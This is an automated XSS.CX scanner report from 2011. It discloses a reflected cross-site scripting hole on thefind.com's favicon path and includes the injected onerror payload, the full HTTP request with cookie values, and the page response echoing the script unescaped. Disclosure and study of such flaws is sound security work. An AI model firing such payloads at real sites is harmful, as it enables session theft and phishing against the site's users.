XSS, Cross Site Scripting, favicon.ico, DORK, Unforgivable Vulnerabilities

http://www.thefind.com/6eeb6%3Cimg%20src%3da%20onerror%3dalert(666)%3E90aa42e9ff8

Report generated by XSS.CX at Mon Mar 07 19:09:27 CST 2011.


Loading

1. Cross-site scripting (reflected)



1. Cross-site scripting (reflected)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6eeb6<img%20src%3da%20onerror%3dalert(1)>90aa42e9ff8 was submitted in the REST URL parameter 1. This input was echoed as 6eeb6<img src=a onerror=alert(1)>90aa42e9ff8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /6eeb6<img%20src%3da%20onerror%3dalert(1)>90aa42e9ff8 HTTP/1.1
Host: www.thefind.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flsid=137df1d3906e54ccd75190de4fa527e5; fl-uid=1ec82cf50734315967b85fc8398482ad%2C1%2C1299459342; __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=1.897036025.1299459384.1299459384.1299459384.1; __utmc=1; __utmb=1.1.10.1299459384

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 00:56:25 GMT
Server: Apache
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Tue, 22 Feb 2011 23:26:04 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Content-Type: text/html; charset=utf-8
Content-Length: 26148

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Untitled Page</title>


<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="//cdn.thefind.com/scripts/main/utils-initjquery-elation-browser-tracking-panel-ajaxlib-events-ui-msie~xpath/tplmgr-tplmgr/ui-infobox/user-user"></script>
<script type="text/javascript">if (typeof elation != "undefined") { elation.file.dependencies.registerMany({"utils":["initjquery","elation","browser","tracking","panel","ajaxlib","events","ui","msie-xpath"],"tplmgr":["tplmgr"],"ui":["infobox"],"user":["user"]}, "javascript"); }</script><link rel="stylesheet" type="text/css" href="//cdn.thefind.com/css/main/utils-ui/ui-infobox/user-user-signin-login/thefind-tabs-footer-layout/page-useless" media="all" />
<script type="text/javascript">if (typeof elation != "undefined") { elation.file.dependencies.registerMany({"utils":["ui"],"ui":["infobox"],"user":["user","signin","login"],"thefind":["tabs","footer","layout"],"page":["useless"]}, "css"); }</script><script type="text/javascript">
//<![CDATA[
elation.tplmgr.Create('ui.infobox', "<div id=\"tf_infobox\">\n\t<div class=\"hd\">\n\t\t<div class=\"c\">\n\t\t<\/div>\n\t<\/div>\n <div class=\"bd\">\n\t\t<div class=\"shadowRight\"><\/div>\n\t\t<div class=\"c\" id=\"tf_infoBoxContent\">(%$content)<\/div>\n <\/div>\n <div class=\"shadowCorner\"><\/div>\n\t<div class=\"ft\"><\/div>\n<\/div>\n");
elation.tplmgr.Create('ui.lightbox', "<div style=\"background: white;\">\n\t(%$content)\n<\/div>\n");
elation.tplmgr.Create('ui.infobox_titlebar', "<div class=\"tf_infobox_popup_titlebar infoBoxClose noFloat\">\n<span style=\"float:left\">(%$label)<\/span>\n<a href=\"#\" onclick=\"elation.ui.infobox.hide('(%$name)'); return false\">\n<span class=\"tf_infobox_popup_closebutton_text\">Close<\/span>\n<img src=\"\/\/cdn.thefind.com\/images\/ui\/close_x.png\" alt=\"[x]\" \/>\n<\/a>\n<\/div>");
//]]>
</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="initial-scale=1.0, user-scalable=no, maximum-scale=1.0" />
<!--
webapp.appversion: development
webapp.abtestversion:
webapp.cobrand: thefind
monitoring.keywords: queryForm
monitoring.ui: r1018
-->

<!--[if IE 7]>
<link rel="stylesheet" type="text/css" href="//cdn.thefind.com/css/main/thefind-ie7" media="all" />
<script type="text/javascript">if (typeof elation != "undefined") { elation.file.dependencies.registerMany({"thefind":["ie7"]}, "css"); }</script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="//cdn.thefind.com/css/main/cobrands-base-thefindfamily" media="all" />
<script type="text/javascript">if (typeof elation != "undefined") { elation.file.dependencies.registerMany({"cobrands":["base","thefindfamily"]}, "css"); }</script>




<meta name="description" content="TheFind.com - shopping search reinvented. What can we find for you?" />
<meta name="keywords" content="" />


<script type="text/javascript">if (elation.onloads) elation.onloads.init();</script>
</head>
<body>
<div id="tf_header">
<div id="tf_header_container">
<div class="tf_utils_panel_header tf_util_clear_after ">

<ul class="tf_utils_panel_content tf_util_clear_after"> <li id="tf_utils_panel_header_page_logo" title="" class="tf_utils_panel_content_item tf_panel_first"> <a href="/">
<img src="//cdn.thefind.com/images/cobrands/logos/thefind.png" alt="TheFind" />
</a>



</li> <li id="tf_utils_panel_header_userinfo" title="" class="tf_utils_panel_content_item">

<div class="tf_user_info tf_user_state_loggedout" id="tf_user_info">
<div class="tf_signin" id="tf_user_signin">


<ul class="tf_user_links">
<li class="tf_user_link">
<a href="/user/login?step=auth&amp;authmethod=facebook" onclick="return elation.user.login(this);"><img src="//cdn.thefind.com/images//user/fb-login-button.png" alt="Sign in with Facebook" class="tf_user_connectwithfacebook" /></a>
<span class="tf_divider">|</span>
</li>
<li class="tf_user_link">
<a class="tf_signin_account userRegistrationLinks" href="/user/login" name="userLogin" onclick="elation.ui.lightbox.get(this.href, '_output=snip'); return false" rel="nofollow">Sign in</a>
<span class="tf_divider">|</span>
</li>
<li class="tf_user_link">
<a class="userRegistrationLinks" href="/user/register" name="userLogin" onclick="elation.ui.lightbox.get(this.href, '_output=snip'); return false" rel="nofollow">Create account</a>
</li>
</ul>
<div id="fb-root"></div>
<script type="text/javascript">
   elation.user.init({"usertype":"anonymous","userid":"9342644166289133857","email":null,"nickname":null,"gender":null,"email_opt":null,"created_time":null,"updated_time":null,"confirm":null,"fluid":"1ec82cf50734315967b85fc8398482ad","ip":"173.193.214.243","authedWith":[]},null,'','108029489239168');
</script>

</div>


</div>





</li> <li id="tf_utils_panel_header_marketing_content" title="" class="tf_utils_panel_content_item">


</li> <li id="tf_utils_panel_header_navigation" title="" class="tf_utils_panel_content_item tf_panel_last"> <div class="tf_utils_panel_tabs tf_util_clear_after ">

<ul class="tf_utils_panel_content tf_util_clear_after tf_utils_panel_horizontal"> <li id="tf_utils_panel_tabs_theweb" title="Search online" class="tf_utils_panel_content_item tf_panel_first selected tf_tooltip"> <a href="http://www.thefind.com/search" rel="nofollow">
<span>Shop The Web</span>
</a>


</li> <li id="tf_utils_panel_tabs_nearby" title="Shop stores near you" class="tf_utils_panel_content_item tf_tooltip"> <a href="http://local.thefind.com/local" rel="nofollow">
<span>Shop Nearby</span>
</a>


</li> <li id="tf_utils_panel_tabs_shoplikeme" title="Shop using your favorite stores and brands" class="tf_utils_panel_content_item tf_tooltip tf_utils_panel_item_hasicon"> <a href="http://www.thefind.com/shoplikeme/stores" rel="nofollow">
<img class="tf_utils_panel_icon" src="//cdn.thefind.com/images/shoplikeme/icon_my_favorites_profile.png" alt="`Array.label|escape:html`" />
<span>Shop Like Me</span>
</a>


</li> <li id="tf_utils_panel_tabs_shoplikefriends" title="Shop using your friends... favorite stores and brands" class="tf_utils_panel_content_item tf_tooltip"> <a href="http://www.thefind.com/shoplikefriends" rel="nofollow">
<span>Shop Like Friends</span>
</a>


</li> <li id="tf_utils_panel_tabs_myfinds" title="Show MyFinds" class="tf_utils_panel_content_item tf_panel_last tf_tooltip"> <a href="http://www.thefind.com/myfinds" rel="nofollow">
<div class="tf_myfinds_page_tab"></div>
</a>


</li> </ul> </div>
<script type="text/javascript">
//<!--
$(document).ready(function() {
elation.panel.add('tabs', {"parent":"","name":"tabs","top":false,"cfg":{"navigation":"true","orientation":"horizontal","type":"panel","dependency":{"tabs":{"name":"utils.tabs","type":"component"}},"items":{"theweb":{"classname":"tf_tooltip","enabled":"1","label":"<span>Shop The Web<\/span>","link":"http:\/\/www.thefind.com\/search","nofollow":"1","order":"0","selected":"true","title":"Search online","type":"panelitem"},"nearby":{"classname":"tf_tooltip","label":"<span>Shop Nearby<\/span>","link":"http:\/\/local.thefind.com\/local","nofollow":"1","order":"1","selected":"false","title":"Shop stores near you","type":"panelitem"},"shoplikeme":{"classname":"tf_tooltip","icon":"shoplikeme\/icon_my_favorites_profile.png","label":"<span>Shop Like Me<\/span>","link":"http:\/\/www.thefind.com\/shoplikeme\/stores","nofollow":"1","order":"2","selected":"false","title":"Shop using your favorite stores and brands","type":"panelitem"},"shoplikefriends":{"classname":"tf_tooltip","enabled":"1","label":"<span>Shop Like Friends<\/span>","link":"http:\/\/www.thefind.com\/shoplikefriends","nofollow":"1","order":"3","selected":"false","title":"Shop using your friends\u2019 favorite stores and brands","type":"panelitem"},"myfinds":{"classname":"tf_tooltip","enabled":"1","label":"<div class=\"tf_myfinds_page_tab\"><\/div>","link":"http:\/\/www.thefind.com\/myfinds","nofollow":"1","order":"4","selected":"false","title":"Show MyFinds","type":"panelitem"}}},"id":"tf_utils_panel_tabs","type":"tabs","enabled":true,"args":[]});
});
//-->
</script>






</li> </ul> </div>
<script type="text/javascript">
//<!--
$(document).ready(function() {
elation.panel.add('header', {"parent":"","name":"header","top":true,"cfg":{"items":{"page_logo":{"component":"thefind.logo","enabled":"1","order":"1"},"search_input":{"component":"search.input","enabled":"0","order":"2","componentargs":{"id":"tf_search_examplesearch_input","placement":"search.header","search":"tf_search_examplesearch"}},"userinfo":{"component":"user.userinfo","enabled":"1","order":"3","componentargs":{"type":"userinfo"}},"marketing_content":{"component":"marketing.content","enabled":"1","order":"4","componentargs":{"placement":"header.bottom"}},"search_info":{"component":"search.info","enabled":"0","order":"5","componentargs":{"enabled":"1","id":"tf_search_info_header_bottom","messages":"search.newtabs","placement":"header.bottom","search":"tf_search_examplesearch"}},"navigation":{"component":"utils.panel","order":"9","componentargs":{"type":"tabs"}}}},"id":"tf_utils_panel_header","type":"header","enabled":true,"args":[]});
});
//-->
</script>



</div>
</div>












<div id="tf_container">
[Could not find component: 6eeb6<img src=a onerror=alert(1)>90aa42e9ff8]
</div>

<div class="tf_utils_panel_footer tf_util_clear_after ">

<ul class="tf_utils_panel_content tf_util_clear_after"> <li id="tf_utils_panel_footer_links_footer" title="" class="tf_utils_panel_content_item tf_panel_last"> <div class="tf_utils_panel_panel tf_util_clear_after ">

<ul class="tf_utils_panel_content tf_util_clear_after"> <li id="tf_utils_panel_footer_links_footer_thefindhome" title="" class="tf_utils_panel_content_item"> <a name="home" href="http://www.thefind.com" rel="nofollow" id="tf_footer_home">TheFind Home</a>


</li> <li id="tf_utils_panel_footer_links_footer_merchantcenter" title="" class="tf_utils_panel_content_item"> <a name="merchantcenter" href="https://merchant.thefind.com/?utm_source=theFind&utm_content=merchant_center&utm_campaign=Footer" rel="nofollow" id="tf_footer_merchantcenter">Merchant Center</a>


</li> <li id="tf_utils_panel_footer_links_footer_merchantblog" title="" class="tf_utils_panel_content_item"> <a name="merchantblog" href="http://merchantblog.thefind.com/?utm_source=theFind&utm_content=merchant_blog&utm_campaign=Footer" rel="nofollow" id="tf_footer_merchantblog">Merchant Blog</a>


</li> <li id="tf_utils_panel_footer_links_footer_submityourstore" title="" class="tf_utils_panel_content_item"> <a name="addamerchant" href="https://merchant.thefind.com/?utm_source=theFind&utm_content=submit_your_store&utm_campaign=Foote" rel="nofollow" id="tf_footer_addamerchant">Submit Your Store</a>


</li> <li id="tf_utils_panel_footer_links_footer_aboutthefind" title="" class="tf_utils_panel_content_item"> <a name="aboutus" href="/main/AboutUs.fhtml" id="tf_footer_aboutus">About TheFind</a>


</li> <li id="tf_utils_panel_footer_links_footer_followusontwitter" title="" class="tf_utils_panel_content_item"> <a name="twitter" href="http://www.twitter.com/thefind" id="tf_footer_twitter">Follow us on Twitter</a>


</li> <li id="tf_utils_panel_footer_links_footer_feedback" title="" class="tf_utils_panel_content_item"> <a id="tf_footer_feedback" rel="nofollow" onclick="showLightBox('55em', '26em'); ajaxlib.Get('/feedback.fhtml?query=digital+cameras'); return false;" href="#" name="feedback">Feedback</a>


</li> <li id="tf_utils_panel_footer_links_footer_becomeourfanonfacebook" title="" class="tf_utils_panel_content_item"> <a name="facebook" href="http://www.facebook.com/thefind" id="tf_footer_facebook">Become our Fan on Facebook</a>


</li> <li id="tf_utils_panel_footer_links_footer_thefindblog" title="" class="tf_utils_panel_content_item"> <a name="ourblog" href="http://blog.thefind.com/" id="tf_footer_ourblog">TheFind Blog</a>


</li> <li id="tf_utils_panel_footer_links_footer_topsearches" title="" class="tf_utils_panel_content_item"> <a name="hotsearches" href="/main/HotSearches.fhtml" id="tf_footer_hotsearches">Top Searches</a>


</li> <li id="tf_utils_panel_footer_links_footer_categorymap" title="" class="tf_utils_panel_content_item"> <a name="categorymap" href="/main/CategoryMap.fhtml" id="tf_footer_categorymap">Shopping Categories</a>


</li> <li id="tf_utils_panel_footer_links_footer_storedirectory" title="" class="tf_utils_panel_content_item"> <a name="storemap" href="/store/directory" id="tf_footer_storemap">Store Directory</a>


</li> <li id="tf_utils_panel_footer_links_footer_whatsupfront" title="" class="tf_utils_panel_content_item"> <a name="whatsupfront" href="/whats-upfront" id="tf_footer_whatsupfront">Upfront Program</a>


</li> <li id="tf_utils_panel_footer_links_footer_privacypolicy" title="" class="tf_utils_panel_content_item tf_panel_last"> Copyright &copy; 2011 <a href="/main/PrivacyPolicy.fhtml">Privacy</a>


</li> </ul> </div>
<script type="text/javascript">
//<!--
$(document).ready(function() {
elation.panel.add('footer.links_footer', {"parent":"footer","name":"footer.links_footer","top":true,"cfg":{"enabled":"1","order":"2","type":"panel","items":{"faqs":{"component":"html.static","enabled":"0","type":"panelitem","componentargs":{"content":"<a id=\"tf_footer_faqs\" rel=\"nofollow\" href=\"\/main\/FAQs.fhtml\" name=\"faqs\">FAQs<\/a>"}},"contactus":{"component":"html.static","enabled":"0","type":"panelitem","componentargs":{"content":"<a id=\"tf_footer_contactus\" rel=\"nofollow\" href=\"\/main\/ContactUs.fhtml\" name=\"contactus\">Contact Us<\/a>"}},"thefindhome":{"component":"html.static","order":"1","type":"panelitem","componentargs":{"content":"<a name=\"home\" href=\"http:\/\/www.thefind.com\" rel=\"nofollow\" id=\"tf_footer_home\">TheFind Home<\/a>"}},"merchantcenter":{"component":"html.static","order":"2","type":"panelitem","componentargs":{"content":"<a name=\"merchantcenter\" href=\"https:\/\/merchant.thefind.com\/?utm_source=theFind&utm_content=merchant_center&utm_campaign=Footer\" rel=\"nofollow\" id=\"tf_footer_merchantcenter\">Merchant Center<\/a>"}},"merchantblog":{"component":"html.static","order":"3","type":"panelitem","componentargs":{"content":"<a name=\"merchantblog\" href=\"http:\/\/merchantblog.thefind.com\/?utm_source=theFind&utm_content=merchant_blog&utm_campaign=Footer\" rel=\"nofollow\" id=\"tf_footer_merchantblog\">Merchant Blog<\/a>"}},"submityourstore":{"component":"html.static","order":"4","type":"panelitem","componentargs":{"content":"<a name=\"addamerchant\" href=\"https:\/\/merchant.thefind.com\/?utm_source=theFind&utm_content=submit_your_store&utm_campaign=Foote\" rel=\"nofollow\" id=\"tf_footer_addamerchant\">Submit Your Store<\/a>"}},"aboutthefind":{"component":"html.static","order":"5","type":"panelitem","componentargs":{"content":"<a name=\"aboutus\" href=\"\/main\/AboutUs.fhtml\" id=\"tf_footer_aboutus\">About TheFind<\/a>"}},"followusontwitter":{"component":"html.static","order":"6","type":"panelitem","componentargs":{"content":"<a name=\"twitter\" href=\"http:\/\/www.twitter.com\/thefind\" id=\"tf_footer_twitter\">Follow us on Twitter<\/a>"}},"feedback":{"component":"html.static","enabled":"1","order":"6","type":"panelitem","componentargs":{"content":"<a id=\"tf_footer_feedback\" rel=\"nofollow\" onclick=\"showLightBox('55em', '26em'); ajaxlib.Get('\/feedback.fhtml?query=digital+cameras'); return false;\" href=\"#\" name=\"feedback\">Feedback<\/a>"}},"becomeourfanonfacebook":{"component":"html.static","order":"7","type":"panelitem","componentargs":{"content":"<a name=\"facebook\" href=\"http:\/\/www.facebook.com\/thefind\" id=\"tf_footer_facebook\">Become our Fan on Facebook<\/a>"}},"thefindblog":{"component":"html.static","order":"8","type":"panelitem","componentargs":{"content":"<a name=\"ourblog\" href=\"http:\/\/blog.thefind.com\/\" id=\"tf_footer_ourblog\">TheFind Blog<\/a>"}},"topsearches":{"component":"html.static","order":"9","type":"panelitem","componentargs":{"content":"<a name=\"hotsearches\" href=\"\/main\/HotSearches.fhtml\" id=\"tf_footer_hotsearches\">Top Searches<\/a>"}},"categorymap":{"component":"html.static","order":"10","type":"panelitem","componentargs":{"content":"<a name=\"categorymap\" href=\"\/main\/CategoryMap.fhtml\" id=\"tf_footer_categorymap\">Shopping Categories<\/a>"}},"storedirectory":{"component":"html.static","order":"11","type":"panelitem","componentargs":{"content":"<a name=\"storemap\" href=\"\/store\/directory\" id=\"tf_footer_storemap\">Store Directory<\/a>"}},"whatsupfront":{"component":"html.static","order":"12","type":"panelitem","componentargs":{"content":"<a name=\"whatsupfront\" href=\"\/whats-upfront\" id=\"tf_footer_whatsupfront\">Upfront Program<\/a>"}},"privacypolicy":{"component":"html.static","order":"13","type":"panelitem","componentargs":{"content":"Copyright &copy; 2011 <a href=\"\/main\/PrivacyPolicy.fhtml\">Privacy<\/a>"}}}},"id":"tf_utils_panel_footer_links_footer","type":"panel","enabled":"1","args":[]});
});
//-->
</script>



</li> </ul> </div>
<script type="text/javascript">
//<!--
$(document).ready(function() {
elation.panel.add('footer', {"parent":"","name":"footer","top":true,"cfg":{"type":"panel","items":{"links_family":{"enabled":"0","order":"1","type":"panel","items":{"glimpse":{"component":"html.static","order":"5","type":"panelitem","componentargs":{"content":"<a name=\"glimpse.com\" href=\"http:\/\/www.glimpse.com\">Glimpse.com<\/a>"}},"label":{"component":"html.static","order":"1","type":"panelitem","componentargs":{"content":"TheFind Sites:"}},"thefindcoupons":{"component":"html.static","order":"2","type":"panelitem","componentargs":{"content":"<a name=\"thefind_coupons\" href=\"http:\/\/coupons.thefind.com\">TheFind Coupons<\/a>"}},"thefindgreen":{"component":"html.static","order":"4","type":"panelitem","componentargs":{"content":"<a name=\"thefind_green\" href=\"http:\/\/green.thefind.com\">TheFind Green<\/a>"}},"thefindlocal":{"component":"html.static","order":"3","type":"panelitem","componentargs":{"content":"<a name=\"thefind_local\" href=\"http:\/\/local.thefind.com\">TheFind Local<\/a>"}},"thefinduk":{"component":"html.static","order":"6","type":"panelitem","componentargs":{"content":"<a name=\"thefind_uk\" href=\"http:\/\/www.thefind.co.uk\/\">theFind UK<\/a>"}}}},"links_footer":{"enabled":"1","order":"2","type":"panel","items":{"aboutthefind":{"component":"html.static","order":"5","type":"panelitem","componentargs":{"content":"<a name=\"aboutus\" href=\"\/main\/AboutUs.fhtml\" id=\"tf_footer_aboutus\">About TheFind<\/a>"}},"becomeourfanonfacebook":{"component":"html.static","order":"7","type":"panelitem","componentargs":{"content":"<a name=\"facebook\" href=\"http:\/\/www.facebook.com\/thefind\" id=\"tf_footer_facebook\">Become our Fan on Facebook<\/a>"}},"categorymap":{"component":"html.static","order":"10","type":"panelitem","componentargs":{"content":"<a name=\"categorymap\" href=\"\/main\/CategoryMap.fhtml\" id=\"tf_footer_categorymap\">Shopping Categories<\/a>"}},"contactus":{"component":"html.static","enabled":"0","type":"panelitem","componentargs":{"content":"<a id=\"tf_footer_contactus\" rel=\"nofollow\" href=\"\/main\/ContactUs.fhtml\" name=\"contactus\">Contact Us<\/a>"}},"faqs":{"component":"html.static","enabled":"0","type":"panelitem","componentargs":{"content":"<a id=\"tf_footer_faqs\" rel=\"nofollow\" href=\"\/main\/FAQs.fhtml\" name=\"faqs\">FAQs<\/a>"}},"feedback":{"component":"html.static","enabled":"1","order":"6","type":"panelitem","componentargs":{"content":"<a id=\"tf_footer_feedback\" rel=\"nofollow\" onclick=\"showLightBox('55em', '26em'); ajaxlib.Get('\/feedback.fhtml?query=digital+cameras'); return false;\" href=\"#\" name=\"feedback\">Feedback<\/a>"}},"followusontwitter":{"component":"html.static","order":"6","type":"panelitem","componentargs":{"content":"<a name=\"twitter\" href=\"http:\/\/www.twitter.com\/thefind\" id=\"tf_footer_twitter\">Follow us on Twitter<\/a>"}},"merchantblog":{"component":"html.static","order":"3","type":"panelitem","componentargs":{"content":"<a name=\"merchantblog\" href=\"http:\/\/merchantblog.thefind.com\/?utm_source=theFind&utm_content=merchant_blog&utm_campaign=Footer\" rel=\"nofollow\" id=\"tf_footer_merchantblog\">Merchant Blog<\/a>"}},"merchantcenter":{"component":"html.static","order":"2","type":"panelitem","componentargs":{"content":"<a name=\"merchantcenter\" href=\"https:\/\/merchant.thefind.com\/?utm_source=theFind&utm_content=merchant_center&utm_campaign=Footer\" rel=\"nofollow\" id=\"tf_footer_merchantcenter\">Merchant Center<\/a>"}},"privacypolicy":{"component":"html.static","order":"13","type":"panelitem","componentargs":{"content":"Copyright &copy; 2011 <a href=\"\/main\/PrivacyPolicy.fhtml\">Privacy<\/a>"}},"storedirectory":{"component":"html.static","order":"11","type":"panelitem","componentargs":{"content":"<a name=\"storemap\" href=\"\/store\/directory\" id=\"tf_footer_storemap\">Store Directory<\/a>"}},"submityourstore":{"component":"html.static","order":"4","type":"panelitem","componentargs":{"content":"<a name=\"addamerchant\" href=\"https:\/\/merchant.thefind.com\/?utm_source=theFind&utm_content=submit_your_store&utm_campaign=Foote\" rel=\"nofollow\" id=\"tf_footer_addamerchant\">Submit Your Store<\/a>"}},"thefindblog":{"component":"html.static","order":"8","type":"panelitem","componentargs":{"content":"<a name=\"ourblog\" href=\"http:\/\/blog.thefind.com\/\" id=\"tf_footer_ourblog\">TheFind Blog<\/a>"}},"thefindhome":{"component":"html.static","order":"1","type":"panelitem","componentargs":{"content":"<a name=\"home\" href=\"http:\/\/www.thefind.com\" rel=\"nofollow\" id=\"tf_footer_home\">TheFind Home<\/a>"}},"topsearches":{"component":"html.static","order":"9","type":"panelitem","componentargs":{"content":"<a name=\"hotsearches\" href=\"\/main\/HotSearches.fhtml\" id=\"tf_footer_hotsearches\">Top Searches<\/a>"}},"whatsupfront":{"component":"html.static","order":"12","type":"panelitem","componentargs":{"content":"<a name=\"whatsupfront\" href=\"\/whats-upfront\" id=\"tf_footer_whatsupfront\">Upfront Program<\/a>"}}}}}},"id":"tf_utils_panel_footer","type":"footer","enabled":true,"args":[]});
});
//-->
</script>





<div class="tf_page_ad_tracking" id="tf_page_ad_footer_middle"> <!-- Begin comScore Tag --><script type="text/javascript">document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));</script><script type="text/javascript">COMSCORE.beacon({c1:2,c2:6309012,c3:"",c4:"",c5:"",c6:"",c15:""});</script><noscript><img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6309012&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" style="display:none" width="0" height="0" alt="" /></noscript><!-- End comScore Tag -->
</div>


<div class="tf_page_ad_tracking" id="tf_page_ad_footer_bottom"> <script type="text/javascript" src="//secure.quantserve.com/quant.js"></script><script type="text/javascript">_qacct="p-82PObOJ4uZfM6";quantserve();</script><noscript><a href="http://www.quantcast.com/p-82PObOJ4uZfM6" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-82PObOJ4uZfM6.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a></noscript>
</div>





<div class="tf_utils_panel_tracking tf_util_clear_after ">

</div>




</body>
</html>


Report generated by XSS.CX at Mon Mar 07 19:09:27 CST 2011.